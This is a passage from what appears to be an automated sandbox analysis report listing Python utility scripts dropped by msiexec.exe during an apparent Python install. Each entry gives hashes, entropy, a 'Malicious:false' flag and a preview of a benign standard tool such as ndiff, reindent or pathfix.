                                                                                                                                Preview:#! /usr/bin/env python3....# mkreal..#..# turn a symlink to a directory into a real directory....import sys..import os..from stat import *....join = os.path.join....error = 'mkreal error'....BUFSIZE = 32*1024....def mkrealfile(name):.. st = os.stat(name) # Get the mode.. mode = S_IMODE(st[ST_MODE]).. linkto = os.readlink(name) # Make sure again it's a symlink.. with open(name, 'rb') as f_in: # This ensures it's a file.. os.unlink(name).. with open(name, 'wb') as f_out:.. while 1:.. buf = f_in.read(BUFSIZE).. if not buf: break.. f_out.write(buf).. os.chmod(name, mode)....def mkrealdir(name):.. st = os.stat(name) # Get the mode.. mode = S_IMODE(st[ST_MODE]).. linkto = os.readlink(name).. files = os.listdir(name).. os.unlink(name).. os.mkdir(name, mode).. os.chmod(name, mode).. linkto = join(os.pardir, linkto).. #.. for filename in files:.. if filename not in (os.curdi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3953
                                                                                                                                Entropy (8bit):4.618738981101271
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:i3B3fl9WU7AOOoabUyJ8s+4IhoBmTi8AFMn49Dmjd:iR399WU7ioAn+4IhIMi8V49Dmjd
                                                                                                                                MD5:D51000825C7B4D6C8F2181D86880723E
                                                                                                                                SHA1:7FC0F1FDD864C515C54704A2011D968B1818917A
                                                                                                                                SHA-256:50CD2C9C6C154E1C6538617E6C9861A7AA6072FD7064B560350B2D8967AEE2EB
                                                                                                                                SHA-512:11CECBD8D6168FD3D6F4B40F9E45115300966172383B5A8BABE96D5467659C4335D9C3EE1F847DE30FCA669F0CA65AC1EAE029569CCFA91DB4397A6AAF494A8B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Module ndiff version 1.7.0..# Released to the public domain 08-Dec-2000,..# by Tim Peters (tim.one@home.com).....# Provided as-is; use at your own risk; no warranty; no promises; enjoy!....# ndiff.py is now simply a front-end to the difflib.ndiff() function...# Originally, it contained the difflib.SequenceMatcher class as well...# This completes the raiding of reusable code from this formerly..# self-contained script....."""ndiff [-q] file1 file2.. or..ndiff (-r1 | -r2) < ndiff_output > file1_or_file2....Print a human-friendly file difference report to stdout. Both inter-..and intra-line differences are noted. In the second form, recreate file1..(-r1) or file2 (-r2) on stdout, from an ndiff report on stdin.....In the first form, if -q ("quiet") is not specified, the first two lines..of output are....-: file1..+: file2....Each remaining line begins with a two-letter code:.... "- " line unique to file1.. "+ " line unique to file2.. " "
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2587
                                                                                                                                Entropy (8bit):4.862800634889264
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:hh9Y7P7q8aqvB7jO8jlM8uYRCkUje3stOKUiYLej1EeBgoPAyK6fC9uQw3Cwdofs:79Y7PucBWalZuiC9jAsPUiyeGeBtAyHv
                                                                                                                                MD5:5E0FFE1DB1797A3ECDD300654B098ED0
                                                                                                                                SHA1:1AF5D08192E653145B192D271525247EE14E509F
                                                                                                                                SHA-256:35FA0FB105E5D175D436322B62A396E91825BDBE1233603596BC2315FF0DB494
                                                                                                                                SHA-512:321C6F1D89734DFB72CA355C6E1B8171FFC65463DADD3A7EF7EFB3330EC91579DAE333A8F6062E8B17A335D7334662E956C0DDAFE7060499218488C8B4E2814F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3.."""nm2def.py....Helpers to extract symbols from Unix libs and auto-generate..Windows definition files from them. Depends on nm(1). Tested..on Linux and Solaris only (-p option to nm is for Solaris only).....By Marc-Andre Lemburg, Aug 1998.....Additional notes: the output of nm is supposed to look like this:....acceler.o:..000001fd T PyGrammar_AddAccelerators.. U PyGrammar_FindDFA..00000237 T PyGrammar_RemoveAccelerators.. U _IO_stderr_.. U exit.. U fprintf.. U free.. U malloc.. U printf....grammar1.o:..00000000 T PyGrammar_FindDFA..00000034 T PyGrammar_LabelRepr.. U _PyParser_TokenNames.. U abort.. U printf.. U sprintf...........Even if this isn't the default output of your nm, there is generally an..option to produce this format (since it is the original v7 Unix format)....."""..import os, sys....PYTHONLIB = 'libpython%d.%d.a' % sys.version_info[:2]..PC_PYTHONLIB = 'Python%
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6153
                                                                                                                                Entropy (8bit):4.4818167519513725
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:woa5QCMNsJeW2f14YRQcidKYhdRFaQz/BY5CyT5WVFjBKk0p0gGSmy0:jGZJeWimFcMKgaQlY5CDDOGSj0
                                                                                                                                MD5:A722F00F0A274512070375BD01027382
                                                                                                                                SHA1:29F8BABF7474ACB7B9228621CBAB09EEEA2CFD05
                                                                                                                                SHA-256:8FC0657D4E5CBB0C4CBDC1C93CF1F26AB7C24172D2C2A116AF9CB2619C3D0D4A
                                                                                                                                SHA-512:75A6062BEE7A41DC9153D416B76D5C0E19307DCA4BA2E6824FB42FD2D2BFDEBE104710B75131AF54033E82F8E411ACDD0E6C9593697FCBC8126C3FCD53702DB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# objgraph..#..# Read "nm -o" input of a set of libraries or modules and print various..# interesting listings, such as:..#..# - which names are used but not defined in the set (and used where),..# - which names are defined in the set (and where),..# - which modules use which other modules,..# - which modules are used by which other modules...#..# Usage: objgraph [-cdu] [file] .....# -c: print callers per objectfile..# -d: print callees per objectfile..# -u: print usage of undefined symbols..# If none of -cdu is specified, all are assumed...# Use "nm -o" to generate the input..# e.g.: nm -o /lib/libc.a | objgraph......import sys..import os..import getopt..import re....# Types of symbols...#..definitions = 'TRGDSBAEC'..externals = 'UV'..ignore = 'Nntrgdsbavuc'....# Regular expression to parse "nm -o" output...#..matcher = re.compile('(.*):\t?........ (.) (.*)$')....# Store "item" in "dict" under "key"...# The dictionary maps keys to lists of items...# If there
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4104
                                                                                                                                Entropy (8bit):4.604717319989667
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:BUUmBBngz9jey6Py123LGspIBJPveQ74NzbS31F0ARAJys/5x2gS:BhmUp/6Pc2yEcXq1bS3b70ys/5IgS
                                                                                                                                MD5:1C209E8FF29EB315507C7395967D339A
                                                                                                                                SHA1:5E77A2A027443076D85FE1847E9348A536D0AB91
                                                                                                                                SHA-256:383A15696DE403CB0C070AAC61C5691ABACA55A5D5E165CD9BC657BB4F73BC3A
                                                                                                                                SHA-512:A69BA3E64B09EE5944755CD40447007946B55758CEEA462FB20E86A49F3A53AF62097886772839716D0303C1A422F1D5BA429129AA931221259E2DE8E9A33FB5
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""..Utility for parsing HTML5 entity definitions available from:.... http://dev.w3.org/html5/spec/entities.json....Written by Ezio Melotti and Iuliia Proskurnia....."""....import os..import sys..import json..from urllib.request import urlopen..from html.entities import html5....entities_url = 'http://dev.w3.org/html5/spec/entities.json'....def get_json(url):.. """Download the json file from the url and returns a decoded object.""".. with urlopen(url) as f:.. data = f.read().decode('utf-8').. return json.loads(data)....def create_dict(entities):.. """Create the html5 dict from the decoded json object.""".. new_html5 = {}.. for name, value in entities.items():.. new_html5[name.lstrip('&')] = value['characters'].. return new_html5....def compare_dicts(old, new):.. """Compare the old and new dicts and print the differences.""".. added = new.keys() - old.keys().. if added:.. print('{} entitie(s) have been added:'
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1804
                                                                                                                                Entropy (8bit):4.761047772271124
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:9W2vsaxx1+5l71JAIUQpU9k75nhez4deaJQzsTocl:wGsap+zZJCQpUY5nlde1q
                                                                                                                                MD5:81911348B02FB0D032092FE0089BF4B6
                                                                                                                                SHA1:D3A9A53B31481981373FDEEB21C8454C993BD230
                                                                                                                                SHA-256:D269BF9C52D74BD320D1AD3D4A4C3FC3EAE6296593FF188A0FBBDEFC209D2C24
                                                                                                                                SHA-512:30EF4919FBCAB83A51F1E9400F5444465C2768A8546137729A3ED76DE6B2CED2BE878E37A3859CE66C65EE1577A4D46F7412DE76AB5BC428DF635410DC2B1C39
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3..""" Utility for parsing HTML entity definitions available from:.... http://www.w3.org/ as e.g... http://www.w3.org/TR/REC-html40/HTMLlat1.ent.... Input is read from stdin, output is written to stdout in form of a.. Python snippet defining a dictionary "entitydefs" mapping literal.. entity name to character or numeric entity..... Marc-Andre Lemburg, mal@lemburg.com, 1999... Use as you like. NO WARRANTIES....."""..import re,sys....entityRE = re.compile(r'<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')....def parse(text,pos=0,endpos=None):.... pos = 0.. if endpos is None:.. endpos = len(text).. d = {}.. while 1:.. m = entityRE.search(text,pos,endpos).. if not m:.. break.. name,charcode,comment = m.groups().. d[name] = charcode,comment.. pos = m.end().. return d....def writefile(f,defs):.... f.write("entitydefs = {\n").. items = sorted(defs.items()).. for
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11135
                                                                                                                                Entropy (8bit):4.609603101168645
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:YJ2sBUDFPGjeAdK85IpGT4j0HjJF7Ny8GnUj9zbCkIiviTcSIcmXDJDAGGXTGWMl:YJC6YGT4Y8YzbCkrGSLdiC
                                                                                                                                MD5:501576C8BB1FD3BDAECE4ED243797627
                                                                                                                                SHA1:AD1E6858A6F1CB0C9BD16AB87AF9865B3A33E5CF
                                                                                                                                SHA-256:9014CAEB8A10C1DD08CA3A22AD4DD12B532907C5AC7D462C5101A15348FEF9A7
                                                                                                                                SHA-512:711C4965B604E0F6E4B845CF6740055587E134284C6FD541CA9ADEC253F011388E5A88AB1416C8CF0487433DC6BD6266E2395DF9D30D89DDE15C24D77CD5C936
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3.."""Check proposed changes for common issues."""..import re..import sys..import shutil..import os.path..import subprocess..import sysconfig....import reindent..import untabify......# Excluded directories which are copies of external libraries:..# don't check their coding style..EXCLUDE_DIRS = [os.path.join('Modules', '_ctypes', 'libffi_osx'),.. os.path.join('Modules', '_ctypes', 'libffi_msvc'),.. os.path.join('Modules', '_decimal', 'libmpdec'),.. os.path.join('Modules', 'expat'),.. os.path.join('Modules', 'zlib')]..SRCDIR = sysconfig.get_config_var('srcdir')......def n_files_str(count):.. """Return 'N file(s)' with the proper plurality on 'file'.""".. return "{} file{}".format(count, "s" if count != 1 else "")......def status(message, modal=False, info=None):.. """Decorator to output status info to stdout.""".. def decorated_fxn(fxn):.. def call_fxn(*args, **kwargs):.. sys.s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7013
                                                                                                                                Entropy (8bit):4.516699796863569
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:PCsAc1/z/bK6b+TSLHbH6gCwIk8bR5CnFTiKZzi6US0:P1AcK6b10wId5Cn1zmx
                                                                                                                                MD5:4A4666E953403731E94E307A729001EA
                                                                                                                                SHA1:B07B567417FE85C4885B5EA224B6D35FD96559D5
                                                                                                                                SHA-256:3FBA71933C59C0FD8E99F8543A49EFD9392191F1AE12820D0921DEA7895FCD46
                                                                                                                                SHA-512:AC954FF04B2C4F62EE1FE435A98E39BDF6FB3B3363C0EC03B2D622EDF8A9EEBBE6358BC3131EF132DC175C5B68FBEB943E7461E0F3B27D3588E89F3A9BACC647
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....# Change the #! line (shebang) occurring in Python scripts. The new interpreter..# pathname must be given with a -i option...#..# Command line arguments are files or directories to be processed...# Directories are searched recursively for files whose name looks..# like a python module...# Symbolic links are always ignored (except as explicit directory..# arguments)...# The original file is kept as a back-up (with a "~" attached to its name),..# -n flag can be used to disable this.....# Sometimes you may find shebangs with flags such as `#! /usr/bin/env python -si`...# Normally, pathfix overwrites the entire line, including the flags...# To change interpreter and keep flags from the original shebang line, use -k...# If you want to keep flags and add to them one single literal flag, use option -a.......# Undoubtedly you can do this using find and sed or perl, but this is..# a nice example of Python code that recurses down a directory tree..# and uses regular ex
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4168
                                                                                                                                Entropy (8bit):4.470738464163329
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:iEnanCzfgKUlTPJkTZ/6Pik03CdLnqjGBIkIwkUGc9aIQWuys5HKHc52aUPh1a1:iEgCkrTPJkTpssGNIIGvIQAsOcih10
                                                                                                                                MD5:7A2D2F9B3F4F996011634411380BD2E0
                                                                                                                                SHA1:6B0DB8379EA139C3DA75E9FF9A0DE43A7E5FB7BA
                                                                                                                                SHA-256:8AF893745DD1FDFF4FA70888AC4F032AAFF221D2CE2796358B13809E72E9EED1
                                                                                                                                SHA-512:22BD74CD92E9520AE41B5783743F7D95FCBFF352E632819FF4549911C8530A07A9C63D000C0CA88EF2E21F3DEFAF2C1E5A9346D0CEB3912AB79087A58D8B6E8E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# pdeps..#..# Find dependencies between a bunch of Python modules...#..# Usage:..# pdeps file1.py file2.py .....#..# Output:..# Four tables separated by lines like '--- Closure ---':..# 1) Direct dependencies, listing which module imports which other modules..# 2) The inverse of (1)..# 3) Indirect dependencies, or the closure of the above..# 4) The inverse of (3)..#..# To do:..# - command line options to select output type..# - option to automatically scan the Python library for referenced modules..# - option to limit output to particular modules......import sys..import re..import os......# Main program..#..def main():.. args = sys.argv[1:].. if not args:.. print('usage: pdeps file.py file.py ...').. return 2.. #.. table = {}.. for arg in args:.. process(arg, table).. #.. print('--- Uses ---').. printresults(table).. #.. print('--- Used By ---').. inv = inverse(table).. printresults(inv).. #..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4867
                                                                                                                                Entropy (8bit):4.432433139906307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:eV0wJw4Ayx6tdiDEfVII2YlYZFnVc1eC7YImGeEcUaPreR:eSswE6yDmQCoC7YIlegACR
                                                                                                                                MD5:2C01A80BC1CDBF51D73BF6C497AA67F5
                                                                                                                                SHA1:7A76A8C09627A2F9FA903D897586FCF5B4EC7D71
                                                                                                                                SHA-256:B9D25D94DC0D4E97683AE9B74DB9FC1EA8D64E5DBFD3A0D9F57DE37D04C49F8E
                                                                                                                                SHA-512:5417F0C4F13E62D18F2FBC9E21E7A243640DE996974CEFFCF5900071FA8163D10523A35FBA641A2ECF4A2D46CA763CB86A7A3217C878C8688E30327A9DACA92C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..pep384_macrocheck.py....This program tries to locate errors in the relevant Python header..files where macros access type fields when they are reachable from..the limited API.....The idea is to search macros with the string "->tp_" in it...When the macro name does not begin with an underscore,..then we have found a dormant error.....Christian Tismer..2018-06-02.."""....import sys..import os..import re......DEBUG = False....def dprint(*args, **kw):.. if DEBUG:.. print(*args, **kw)....def parse_headerfiles(startpath):.. """.. Scan all header files which are reachable fronm Python.h.. """.. search = "Python.h".. name = os.path.join(startpath, search).. if not os.path.exists(name):.. raise ValueError("file {} was not found in {}\n".. "Please give the path to Python's include directory.".. .format(search, startpath)).. errors = 0.. with open(name) as python_h:.. while True:.. line = python_h.readline()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4168
                                                                                                                                Entropy (8bit):4.315513257760245
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Y/0s43A2t+fUUTQB80uD8lHmHLsdJS7/SB4aqDyUpypUAp4pDkJpDTqplppYDrAC:4433Un8B87iHmHu07qBBqmfocrMA4O
                                                                                                                                MD5:72CD30B1FADA08D830C003E3AD664F3D
                                                                                                                                SHA1:10A56BA361E24EA2A4AC5F6B1C31E174EAC6E0EA
                                                                                                                                SHA-256:1CA6D83C45F60AE5ED8D127713C7D08743AA997AD1BF79002053C2154746CDEE
                                                                                                                                SHA-512:9C40DAD8CD976F90366206900F557F6F36F94E753A695DBEA0B610DC8029F361C0FD36FDF0D89BEE08A8C66F85EC4F8AC4173F8A65839409492558B1209D42B2
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3...."""..Synopsis: %(prog)s [-h|-b|-g|-r|-a|-d] [ picklefile ] dbfile....Read the given picklefile as a series of key/value pairs and write to a new..database. If the database already exists, any contents are deleted. The..optional flags indicate the type of the output database:.... -a - open using dbm (open any supported format).. -b - open as bsddb btree file.. -d - open as dbm.ndbm file.. -g - open as dbm.gnu file.. -h - open as bsddb hash file.. -r - open as bsddb recno file....The default is hash. If a pickle file is named it is opened for read..access. If no pickle file is named, the pickle input is read from standard..input.....Note that recno databases can only contain integer keys, so you can't dump a..hash or btree database using db2pickle.py and reconstitute it to a recno..database with %(prog)s unless your keys are integers....."""....import getopt..try:.. import bsddb..except ImportError:.. bsddb = None..try:.. import db
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17633
                                                                                                                                Entropy (8bit):4.407572266186303
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:5bHsvaIQMx1PsuZBm60WBfvKih8ioeHvwQJPIhuo6vaWPpHLkkZ/vbLXujpTu1vB:5bHsvrt/PsuZBm60W1vKih8ioeHvwQJV
                                                                                                                                MD5:AEDB61A52CA541C157023EE315D6D09F
                                                                                                                                SHA1:BD7721BB7E57CCDF8298B8CD19C85443E09BDDAC
                                                                                                                                SHA-256:08C83FD5E904226090D1DB5EB94DBCE27CAE171B4403B3031ADA404381A9FEE9
                                                                                                                                SHA-512:0D9AF3318AFE0645DEC5ECA013CB5329D61DEE115815020FFEFF54438DF5D1B1DAFE6A7622CDD68DC1D67F60580C04EE3C2542DB2D0DFA0FB6A700D982F10018
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# This file contains a class and a main program that perform three..# related (though complimentary) formatting operations on Python..# programs. When called as "pindent -c", it takes a valid Python..# program as input and outputs a version augmented with block-closing..# comments. When called as "pindent -d", it assumes its input is a..# Python program with block-closing comments and outputs a commentless..# version. When called as "pindent -r" it assumes its input is a..# Python program with block-closing comments but with its indentation..# messed up, and outputs a properly indented version.....# A "block-closing comment" is a comment of the form '# end <keyword>'..# where <keyword> is the keyword that opened the block. If the..# opening keyword is 'def' or 'class', the function or class name may..# be repeated in the block-closing comment as well. Here is an..# example of a program fully augmented with block-closing comments:....# def foobar(a, b):.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1369
                                                                                                                                Entropy (8bit):4.453513861584899
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yXfkFDeq0TqWbd5QvdZbNkBaAoM2k6wxgkF1AxiODu1Qd2L9v70B6+3OaN:IkFDeq0TtBevlkBLIk/tFKzkpwBmaN
                                                                                                                                MD5:9DD4117A259FE3FE7F6A94FFFC6E1428
                                                                                                                                SHA1:312618AA0EE2DF9C4C06AEE371452093C950DFD4
                                                                                                                                SHA-256:3931A6E0252A1011E03C30C80F0E009B0F37AC65EDC9A24511DDFFF815C52D26
                                                                                                                                SHA-512:2F6990C3AB38E77FF6ACD8FB216D9C9F2787B38452B8981899E28A2317A67079A21B9AE7A4383A8D37F020F0D64EF5ECED36FEE7BFE57F3E24831514DD590FDA
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# ptags..#..# Create a tags file for Python programs, usable with vi...# Tagged are:..# - functions (even inside other defs or classes)..# - classes..# - filenames..# Warns about files it cannot open...# No warnings about duplicate tags.....import sys, re, os....tags = [] # Modified global variable!....def main():.. args = sys.argv[1:].. for filename in args:.. treat_file(filename).. if tags:.. with open('tags', 'w') as fp:.. tags.sort().. for s in tags: fp.write(s)......expr = r'^[ \t]*(def|class)[ \t]+([a-zA-Z0-9_]+)[ \t]*[:\(]'..matcher = re.compile(expr)....def treat_file(filename):.. try:.. fp = open(filename, 'r').. except:.. sys.stderr.write('Cannot open %s\n' % filename).. return.. with fp:.. base = os.path.basename(filename).. if base[-3:] == '.py':.. base = base[:-3].. s = base + '\t' + filename + '\t' + '1\n'.. tags.append(s)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85
                                                                                                                                Entropy (8bit):4.668362266497915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:TKQWaHMPA0HXXyXyMDF6ghAj5EMCCFodaMNMy:HWaHo3IyCF6+AjajVdtMy
                                                                                                                                MD5:5EDAC5FDDE928E4C6E7119B8F05DFDBC
                                                                                                                                SHA1:A7D6F17D328ACD47105A71A921CAF4169F4F8A77
                                                                                                                                SHA-256:DE76AC9D4C72E00FF3EED11C583AA7D07394A65948B3CF65DA045D73CE3567E4
                                                                                                                                SHA-512:04C65B1E911A92D3EEB007A261E7A12BB9C20E1E8EBA3096B603CEE26E7F67EA0FE53D3229EE7637D2ABBF5C9929FD8C205B3D87C41D46594F298981B16A8854
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....import pydoc..if __name__ == '__main__':.. pydoc.cli()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3994
                                                                                                                                Entropy (8bit):4.582100829870453
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:vUpZd+jt19ARpMv3sLuxPnQhFv/WUG4fICtI5KYGFSxdzwF64T8mT98lPy:9CDMv3sLuZQhFv/AeIC6UsxdMF64T5Zt
                                                                                                                                MD5:223DB68EE8672E24B5BE0C6A86174DA7
                                                                                                                                SHA1:A10557F09A737F522A312BE44D551886ACB5A8B8
                                                                                                                                SHA-256:978BAF0838714581E8F093257C52E5F8DC32CD2BBF0056DA13502EDDAB74AA01
                                                                                                                                SHA-512:4F4E6D0CB0C5E1662CBAA55883F5F2A61024EB7042C62C4B69D04A5577A9146EFF58C10FC1955505E033971917504D445687FB316E003400825CD8C9AEBB9A18
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3...."""\..List python source files.....There are three functions to check whether a file is a Python source, listed..here with increasing complexity:....- has_python_ext() checks whether a file name ends in '.py[w]'...- look_like_python() checks whether the file is not binary and either has.. the '.py[w]' extension or the first line contains the word 'python'...- can_be_compiled() checks whether the file can be compiled by compile().....The file also must be of appropriate size - not bigger than a megabyte.....walk_python_files() recursively lists all Python files under the given directories..."""..__author__ = "Oleg Broytmann, Georg Brandl"....__all__ = ["has_python_ext", "looks_like_python", "can_be_compiled", "walk_python_files"]......import os, re....binary_re = re.compile(br'[\x00-\x08\x0E-\x1F\x7F]')....debug = False....def print_debug(msg):.. if debug: print(msg)......def _open(fullpath):.. try:.. size = os.stat(fullpath).st_size.. except O
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):293
                                                                                                                                Entropy (8bit):4.937596031490505
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:HWaHoXo7AIyNvqtVSemSHf3Ymu/S+QMAmNirWADl40Ajaj+T/ov:HwXOfy5qtVzbatQMAmwrvH2aSzov
                                                                                                                                MD5:DCDA01175885EBE1257772C1782F3C43
                                                                                                                                SHA1:56582C1F40D022326D9B6A1538965528F68AA863
                                                                                                                                SHA-256:B9F624B9893045D12688A6CBE6248FB2E1CE03B2206490D5F4BFB6D12F0C25CE
                                                                                                                                SHA-512:833A5004BB1699697E73F7D9052EF3E32231BDDA50AB4B417AB2386FBBD9153574CB67DA39FD4B41CAD3288C2C940E09B3D38A892C0BD0AB1CA75C8438E9F482
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....# Make a reST file compliant to our pre-commit hook...# Currently just remove trailing whitespace.....import sys....import patchcheck....def main(argv=sys.argv):.. patchcheck.normalize_docs_whitespace(argv[1:])....if __name__ == '__main__':.. sys.exit(main())..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11980
                                                                                                                                Entropy (8bit):4.288649130888799
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:FNg16+rE1ET/c/n/GC1p7CR+D/pLRTEJ4v7SZldWbbc0:Xgs+o1J1xTLOJoB
                                                                                                                                MD5:A612CFEEB4461592C8AEEA4AB713883A
                                                                                                                                SHA1:D93B25842FE1E322FA3A5245F406209A84D6F9CA
                                                                                                                                SHA-256:BF6AF5E3116EBB61B49B5DF44F24302A76376667D7E2658A8575886EC9971F87
                                                                                                                                SHA-512:399EEBE3AF0C2360A35B59B5A83E2D92B4C6AA5B678ACBDBB088C92A85E6EC9C5C11A736DAF86534D95C5D53BCA9CC1EF08B5334E0A1AFC42854E5E74FB43685
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Released to the public domain, by Tim Peters, 03 October 2000....."""reindent [-d][-r][-v] [ path ... ]....-d (--dryrun) Dry run. Analyze, but don't make any changes to, files...-r (--recurse) Recurse. Search for all .py files in subdirectories too...-n (--nobackup) No backup. Does not make a ".bak" file before reindenting...-v (--verbose) Verbose. Print informative msgs; else no output... (--newline) Newline. Specify the newline character to use (CRLF, LF)... Default is the same as the original file...-h (--help) Help. Print this usage information and exit.....Change Python (.py) files to use 4-space indents and no hard tab characters...Also trim excess spaces and tabs from ends of lines, and remove empty lines..at the end of files. Also ensure the last line ends with a newline.....If no paths are given on the command line, reindent operates as a filter,..reading a single source file from standard input an
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1647
                                                                                                                                Entropy (8bit):4.2374511211113814
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yWldovST+Fga5bqNUxkqZKvH6HVl4Dh59AXzMD5ffFybzbh8OWRbkDuIJb3fnNaN:QqTKgaxq+vwDkCfkPCIDuIJbvNaN
                                                                                                                                MD5:152843710520260C35A4F7A4FC3B78A7
                                                                                                                                SHA1:173F0CAAFAB20320FBC15C8D9D7A88422580586F
                                                                                                                                SHA-256:D7354E56BE5E7B75D1D92678D243977DA31BA107813D8031A085E307BE7DA07D
                                                                                                                                SHA-512:3A21B8DF12B95EFC91CE6CC09F86D468E933E9DAF24BFE04EE7BEEC6EA7F18FF00F519C44A6B1676FDDE101511A3ADF48168B8F58862A7C1C1F27D4BC054B977
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Reverse grep.....Usage: rgrep [-i] pattern file.."""....import sys..import re..import getopt......def main():.. bufsize = 64 * 1024.. reflags = 0.. opts, args = getopt.getopt(sys.argv[1:], "i").. for o, a in opts:.. if o == '-i':.. reflags = reflags | re.IGNORECASE.. if len(args) < 2:.. usage("not enough arguments").. if len(args) > 2:.. usage("exactly one file argument required").. pattern, filename = args.. try:.. prog = re.compile(pattern, reflags).. except re.error as msg:.. usage("error in regular expression: %s" % msg).. try:.. f = open(filename).. except IOError as msg:.. usage("can't open %r: %s" % (filename, msg), 1).. with f:.. f.seek(0, 2).. pos = f.tell().. leftover = None.. while pos > 0:.. size = min(pos, bufsize).. pos = pos - size.. f.seek(pos).. buffer = f.read(size)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3310
                                                                                                                                Entropy (8bit):4.731492298923889
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:WmQTdv08O5IITIPVIyNffu8VPuqYM9tA5FTm9XDbl60zSAoS:WHv0RIOItIy+ePnYM9OrCRloS
                                                                                                                                MD5:6251E3A92846FDE310F6667E9572A348
                                                                                                                                SHA1:9B62A58F3475983A7D869CCBD2B0B5B653F3D83F
                                                                                                                                SHA-256:9E7816C63841AEB1656F246FABE41FF37B9EDFFB1021E1F1213A3C63423A7257
